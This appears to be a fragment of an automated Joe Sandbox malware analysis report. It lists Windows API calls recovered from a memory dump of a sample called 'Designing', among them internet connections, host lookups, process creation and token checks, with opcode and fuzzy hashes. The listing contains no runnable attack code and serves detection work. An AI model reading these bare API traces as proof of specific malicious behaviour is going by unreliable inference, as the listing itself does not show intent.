                                              • GetCursorPos.USER32(?), ref: 00BBCB7A
                                              • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00B6BCEC,?,?,?,?,?), ref: 00BBCB8F
                                              • GetCursorPos.USER32(?), ref: 00BBCBDC
                                              • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00B6BCEC,?,?,?), ref: 00BBCC16
                                              Similarity
                                              • API ID: Cursor$LongMenuPopupProcTrackWindow
                                              • String ID:
                                              • API String ID: 2864067406-0
                                              APIs
                                              • __setmode.LIBCMT ref: 00B50BE2
                                                • Part of subcall function 00B4402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00B97E51,?,?,00000000), ref: 00B44041
                                                • Part of subcall function 00B4402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00B97E51,?,?,00000000,?,?), ref: 00B44065
                                              • _fprintf.LIBCMT ref: 00B50C19
                                              • OutputDebugStringW.KERNEL32(?), ref: 00B8694C
                                                • Part of subcall function 00B54CCA: _flsall.LIBCMT ref: 00B54CE3
                                              • __setmode.LIBCMT ref: 00B50C4E
                                              Similarity
                                              • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                              • String ID:
                                              • API String ID: 521402451-0
                                              APIs
                                                • Part of subcall function 00B88D28: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00B88D3F
                                                • Part of subcall function 00B88D28: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00B88D49
                                                • Part of subcall function 00B88D28: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00B88D58
                                                • Part of subcall function 00B88D28: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00B88D5F
                                                • Part of subcall function 00B88D28: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00B88D75
                                              • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00B892C1
                                              • _memcmp.LIBCMT ref: 00B892E4
                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00B8931A
                                              • HeapFree.KERNEL32(00000000), ref: 00B89321
                                              Similarity
                                              • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                              • String ID:
                                              • API String ID: 1592001646-0
                                              APIs
                                              • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00BA1E6F
                                                • Part of subcall function 00BA1EF9: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00BA1F18
                                                • Part of subcall function 00BA1EF9: InternetCloseHandle.WININET(00000000), ref: 00BA1FB5
                                              Similarity
                                              • API ID: Internet$CloseConnectHandleOpen
                                              • String ID:
                                              • API String ID: 1463438336-0
                                              • Opcode ID: 8223bbe539d14bdc906512cd2b2308c3f1dfe5ba768abd47d937ea608708aceb
                                              • Instruction ID: 706129dd53d7c5a6c4d46d5714da2ee64cdef48ab20e8c134a2e386edabf0b4c
                                              • Opcode Fuzzy Hash: 8223bbe539d14bdc906512cd2b2308c3f1dfe5ba768abd47d937ea608708aceb
                                              • Instruction Fuzzy Hash: AF21D135208605BFDB569F68CC00FBBB7EAFF89700F00495AFE0597650DB71A811ABA0
                                              APIs
                                              • GetWindowLongW.USER32(?,000000EC), ref: 00BB63BD
                                              • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00BB63D7
                                              • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00BB63E5
                                              • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00BB63F3
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: Window$Long$AttributesLayered
                                              • String ID:
                                              • API String ID: 2169480361-0
                                              • Opcode ID: 40e33a25fcddaa558e1772f356edbc85fc5f9ea6b0e44a067ef65b51789379a2
                                              • Instruction ID: da42dffb89802d6a1cb315e7a16f0bcc577da675d86d91d43f5fa446d19f7301
                                              • Opcode Fuzzy Hash: 40e33a25fcddaa558e1772f356edbc85fc5f9ea6b0e44a067ef65b51789379a2
                                              • Instruction Fuzzy Hash: 43112631300414AFD704AB28DC94FBA77D8EF45320F244158F916C72D1CBA5AC00CB94
                                              APIs
                                                • Part of subcall function 00B8F858: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00B8E46F,?,?,?,00B8F262,00000000,000000EF,00000119,?,?), ref: 00B8F867
                                                • Part of subcall function 00B8F858: lstrcpyW.KERNEL32(00000000,?), ref: 00B8F88D
                                                • Part of subcall function 00B8F858: lstrcmpiW.KERNEL32(00000000,?,00B8E46F,?,?,?,00B8F262,00000000,000000EF,00000119,?,?), ref: 00B8F8BE
                                              • lstrlenW.KERNEL32(?,00000002,?,?,?,?,00B8F262,00000000,000000EF,00000119,?,?,00000000), ref: 00B8E488
                                              • lstrcpyW.KERNEL32(00000000,?), ref: 00B8E4AE
                                              • lstrcmpiW.KERNEL32(00000002,cdecl,?,00B8F262,00000000,000000EF,00000119,?,?,00000000), ref: 00B8E4E2
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: lstrcmpilstrcpylstrlen
                                              • String ID: cdecl
                                              • API String ID: 4031866154-3896280584
                                              • Opcode ID: befe38174580299fb9735cd5c868585368537ce5beb51b26f58012cfd51067c6
                                              • Instruction ID: 025b08f60cfee948f53cd6301d1793c49e6b76858fb5f7dc2ecbc6023884a6f7
                                              • Opcode Fuzzy Hash: befe38174580299fb9735cd5c868585368537ce5beb51b26f58012cfd51067c6
                                              • Instruction Fuzzy Hash: 5311AC3A200345EBDB25AF24D845D7A77E8FF49350B4440AAF81ACB2A0EB31E940C791
                                              APIs
                                              • _free.LIBCMT ref: 00B65331
                                                • Part of subcall function 00B5593C: __FF_MSGBANNER.LIBCMT ref: 00B55953
                                                • Part of subcall function 00B5593C: __NMSG_WRITE.LIBCMT ref: 00B5595A
                                                • Part of subcall function 00B5593C: RtlAllocateHeap.NTDLL(01930000,00000000,00000001,?,00000004,?,?,00B51003,?), ref: 00B5597F
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: AllocateHeap_free
                                              • String ID:
                                              • API String ID: 614378929-0
                                              • Opcode ID: b6132c61866539664a298d59cf96fbd7b410edc745d8bba36d9077695cebd65a
                                              • Instruction ID: 648af428e47a4f73ba5878e56eeca076cca1904a0b83369e5d87979fc89a1a07
                                              • Opcode Fuzzy Hash: b6132c61866539664a298d59cf96fbd7b410edc745d8bba36d9077695cebd65a
                                              • Instruction Fuzzy Hash: D1112B32505E06EFCB303F70AC4175A37D49F54BE1F1045E9FC469B290DE7889508798
                                              APIs
                                              • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00B94385
                                              • _memset.LIBCMT ref: 00B943A6
                                              • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 00B943F8
                                              • CloseHandle.KERNEL32(00000000), ref: 00B94401
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: CloseControlCreateDeviceFileHandle_memset
                                              • String ID:
                                              • API String ID: 1157408455-0
                                              • Opcode ID: 9be71ca1f47fe638402f2646042d9334406e9be7bb36a9307b9b69fba18b27a1
                                              • Instruction ID: dfd712a99f7d6238b9b1ed6382852b25785849a629ebd56b19ad02758fc6ddca
                                              • Opcode Fuzzy Hash: 9be71ca1f47fe638402f2646042d9334406e9be7bb36a9307b9b69fba18b27a1
                                              • Instruction Fuzzy Hash: 12110171901328BAD7309765AC4DFEBBBBCDF45760F0045E6F904D7280D6704E4087A4
                                              APIs
                                                • Part of subcall function 00B4402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00B97E51,?,?,00000000), ref: 00B44041
                                                • Part of subcall function 00B4402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00B97E51,?,?,00000000,?,?), ref: 00B44065
                                              • gethostbyname.WSOCK32(?,?,?), ref: 00BA6A84
                                              • WSAGetLastError.WSOCK32(00000000), ref: 00BA6A8F
                                              • _memmove.LIBCMT ref: 00BA6ABC
                                              • inet_ntoa.WSOCK32(?), ref: 00BA6AC7
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                              • String ID:
                                              • API String ID: 1504782959-0
                                              • Opcode ID: f382af6cc250ffd76cfed9369b36b28142974f9de6199411bb92a9e363f7cfc4
                                              • Instruction ID: 93be9e53d5a346714a56a46cad04f1b5d03b790526e036a3814190563791db36
                                              • Opcode Fuzzy Hash: f382af6cc250ffd76cfed9369b36b28142974f9de6199411bb92a9e363f7cfc4
                                              • Instruction Fuzzy Hash: 651142719001089FCB04FBA4DD86DAE77F8EF08310B1480A5F506A7262DF30AE14DBA1
                                              APIs
                                              • SendMessageW.USER32(?,000000B0,?,?), ref: 00B89719
                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00B8972B
                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00B89741
                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00B8975C
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: MessageSend
                                              • String ID:
                                              • API String ID: 3850602802-0
                                              • Opcode ID: d6c30da8b1173801694dc8a6b00cb3642bf75587ddd2efd3b4eb85e7e104c530
                                              • Instruction ID: a368c914e147f9539c33eba0795ab2692ec6bd8dfc371b387b399855c758305d
                                              • Opcode Fuzzy Hash: d6c30da8b1173801694dc8a6b00cb3642bf75587ddd2efd3b4eb85e7e104c530
                                              • Instruction Fuzzy Hash: ED114839900218FFEF11EF95C984EADBBB8FB48710F204091EA00B72A0DB716E10DB90
                                              APIs
                                                • Part of subcall function 00B329E2: GetWindowLongW.USER32(?,000000EB), ref: 00B329F3
                                              • DefDlgProcW.USER32(?,00000020,?), ref: 00B316B4
                                              • GetClientRect.USER32(?,?), ref: 00B6B93C
                                              • GetCursorPos.USER32(?), ref: 00B6B946
                                              • ScreenToClient.USER32(?,?), ref: 00B6B951
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: Client$CursorLongProcRectScreenWindow
                                              • String ID:
                                              • API String ID: 4127811313-0
                                              • Opcode ID: 13aa51ecba6fbbc1424307f4f74da9ba8207b223edbd2454fe37d114ebd4cbd3
                                              • Instruction ID: 4b57f47386ed1f81a1caf2cf56d0f14f87e4e7decca657c0deaba7cce21f9c5d
                                              • Opcode Fuzzy Hash: 13aa51ecba6fbbc1424307f4f74da9ba8207b223edbd2454fe37d114ebd4cbd3
                                              • Instruction Fuzzy Hash: F9112576A10119EBCB10EF98C886DFE77F8EB09300F240895F951E7150CB30BA51CBA1
                                              APIs
                                              • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00B3214F
                                              • GetStockObject.GDI32(00000011), ref: 00B32163
                                              • SendMessageW.USER32(00000000,00000030,00000000), ref: 00B3216D
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: CreateMessageObjectSendStockWindow
                                              • String ID:
                                              • API String ID: 3970641297-0
                                              • Opcode ID: 440143224eba2558d60386d551c19a76ca5d6ab7fccdef07c21767186e687d8b
                                              • Instruction ID: 99c421dd7aea66718cda94dce9486f4f6092f26dc72f6d6bed9547d46f72ab80
                                              • Opcode Fuzzy Hash: 440143224eba2558d60386d551c19a76ca5d6ab7fccdef07c21767186e687d8b
                                              • Instruction Fuzzy Hash: A111AD72501A09BFDF025F94DD84EEBBBA9EF58394F140152FB1462110CB31DC60DBA0
                                              APIs
                                              • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00B904EC,?,00B9153F,?,00008000), ref: 00B9195E
                                              • Sleep.KERNEL32(00000000,?,?,?,?,?,?,00B904EC,?,00B9153F,?,00008000), ref: 00B91983
                                              • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00B904EC,?,00B9153F,?,00008000), ref: 00B9198D
                                              • Sleep.KERNEL32(?,?,?,?,?,?,?,00B904EC,?,00B9153F,?,00008000), ref: 00B919C0
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: CounterPerformanceQuerySleep
                                              • String ID:
                                              • API String ID: 2875609808-0
                                              • Opcode ID: 60e8e30b2d4e3138d7c7755f7dc8a63129495517f5f1f84d18fa191072dd50bc
                                              • Instruction ID: 802954fb299e9bb71bdc67747cfa0eea4fc588d3cec2a5655986187fa7936838
                                              • Opcode Fuzzy Hash: 60e8e30b2d4e3138d7c7755f7dc8a63129495517f5f1f84d18fa191072dd50bc
                                              • Instruction Fuzzy Hash: BB117C31C0061EDBCF00AFA9D998AEEFBB8FF09701F4544A5E980B6240CB3096519B91
                                              APIs
                                              • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 00BBE1EA
                                              • LoadTypeLibEx.OLEAUT32(?,00000002,0000000C), ref: 00BBE201
                                              • RegisterTypeLib.OLEAUT32(0000000C,?,00000000), ref: 00BBE216
                                              • RegisterTypeLibForUser.OLEAUT32(0000000C,?,00000000), ref: 00BBE234
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: Type$Register$FileLoadModuleNameUser
                                              • String ID:
                                              • API String ID: 1352324309-0
                                              • Opcode ID: 1e92fee3c6dbebdd2017d0214baefaefaddcebed99aa34cf495ccae7eb7845dc
                                              • Instruction ID: 51b5369c2b62675582f21fcdf804aa6e25662af275e2ca9cb7a2b7a988dc80ec
                                              • Opcode Fuzzy Hash: 1e92fee3c6dbebdd2017d0214baefaefaddcebed99aa34cf495ccae7eb7845dc
                                              • Instruction Fuzzy Hash: 91115EB5205304DBE7349F51ED49FE3BBFCEB04B04F108599A626D6160D7B0E5049BA1
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                              • String ID:
                                              • API String ID: 3016257755-0
                                              • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                              • Instruction ID: 428a7bbf0427565c4aa1ef583102818e6b299b057d57c8877a342f6de30b310c
                                              • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                              • Instruction Fuzzy Hash: AD01953208814EBBCF125F84CC51CED3FA2FB1A358B148595FA1858131CB3AC9B1AB81
                                              APIs
                                              • GetWindowRect.USER32(?,?), ref: 00BBB956
                                              • ScreenToClient.USER32(?,?), ref: 00BBB96E
                                              • ScreenToClient.USER32(?,?), ref: 00BBB992
                                              • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00BBB9AD
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: ClientRectScreen$InvalidateWindow
                                              • String ID:
                                              • API String ID: 357397906-0
                                              • Opcode ID: 6c59478e163324b2364dc336bf5a22addbfbb5b8ebf790ba52e52743b0273521
                                              • Instruction ID: 70b83b249461a948343e05d94acb9900e2204a495d3554c1ceebe9a4880815d1
                                              • Opcode Fuzzy Hash: 6c59478e163324b2364dc336bf5a22addbfbb5b8ebf790ba52e52743b0273521
                                              • Instruction Fuzzy Hash: 501144B9D00209EFDB41DF98C984AEEBBF9FF48310F104166E954E3610D775AA658F50
                                              APIs
                                              • _memset.LIBCMT ref: 00BBBCB6
                                              • _memset.LIBCMT ref: 00BBBCC5
                                              • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00BF8F20,00BF8F64), ref: 00BBBCF4
                                              • CloseHandle.KERNEL32 ref: 00BBBD06
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                               • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: _memset$CloseCreateHandleProcess
                                              • String ID:
                                              • API String ID: 3277943733-0
                                              • Opcode ID: fe8f477f3dbeec74b9e6d4600161adc64f32575b90c169b758ec9f1d20760b69
                                              • Instruction ID: d374bf1e770236f1121d6bb21e27f96e2ca7f3503db70b594ff8efd2af3825b6
                                              • Opcode Fuzzy Hash: fe8f477f3dbeec74b9e6d4600161adc64f32575b90c169b758ec9f1d20760b69
                                              • Instruction Fuzzy Hash: E4F05EB2540304BFE7502761AC05FBB3A9DEB0C751F040861BE08DB1A2DFB54810C7A8
                                              APIs
                                              • EnterCriticalSection.KERNEL32(?), ref: 00B971A1
                                                • Part of subcall function 00B97C7F: _memset.LIBCMT ref: 00B97CB4
                                              • _memmove.LIBCMT ref: 00B971C4
                                              • _memset.LIBCMT ref: 00B971D1
                                              • LeaveCriticalSection.KERNEL32(?), ref: 00B971E1
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                               • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: CriticalSection_memset$EnterLeave_memmove
                                              • String ID:
                                              • API String ID: 48991266-0
                                              • Opcode ID: afafcd24876caf77b8392ef6b4bf138bc4b6488dad42262c7c3ec1724377cc62
                                              • Instruction ID: 141b2f81667faef3afa405af590a0f26ec6b933587fb7a2aa5be145a5880a45a
                                              • Opcode Fuzzy Hash: afafcd24876caf77b8392ef6b4bf138bc4b6488dad42262c7c3ec1724377cc62
                                              • Instruction Fuzzy Hash: 38F05476100100ABCF016F55DC85F4ABB69EF49361F08C0A1FE085F26ACB31A915DBB4
                                              APIs
                                                • Part of subcall function 00B316CF: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00B31729
                                                • Part of subcall function 00B316CF: SelectObject.GDI32(?,00000000), ref: 00B31738
                                                • Part of subcall function 00B316CF: BeginPath.GDI32(?), ref: 00B3174F
                                                • Part of subcall function 00B316CF: SelectObject.GDI32(?,00000000), ref: 00B31778
                                              • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00BBC3E8
                                              • LineTo.GDI32(00000000,?,?), ref: 00BBC3F5
                                              • EndPath.GDI32(00000000), ref: 00BBC405
                                              • StrokePath.GDI32(00000000), ref: 00BBC413
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                               • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                              • String ID:
                                              • API String ID: 1539411459-0
                                              • Opcode ID: c7ba55e12b09c95af8f8cf465bae3deb514c63a7797e89d3ff007f7ba5e9330e
